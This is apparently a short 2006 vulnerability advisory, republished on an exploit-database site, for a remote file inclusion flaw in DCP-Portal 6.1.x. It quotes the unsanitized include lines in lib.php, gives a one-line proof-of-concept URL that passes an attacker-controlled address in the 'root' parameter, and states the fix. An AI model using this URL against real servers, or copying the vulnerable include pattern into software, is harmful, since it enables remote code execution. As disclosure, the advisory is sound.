[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

Author
Federico Fazzi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-512
Category
web applications
Date add
11-06-2006
Platform
unsorted
=========================================================
DCP-Portal 6.1.x (root) Remote File Include Vulnerability
=========================================================




-----------------------------------------------------
Advisory id: FSA:013

Author:    Federico Fazzi
Date:      12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type:      high
Product:   http://www.dcp-portal.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root not sanitized (declare).

2) Proof of concept:

http://example/[dp_path]/library/lib.php?root=[cmd_url]

3) Solution:

declare $root variable on this file.


#  0day.today [2024-12-25]  #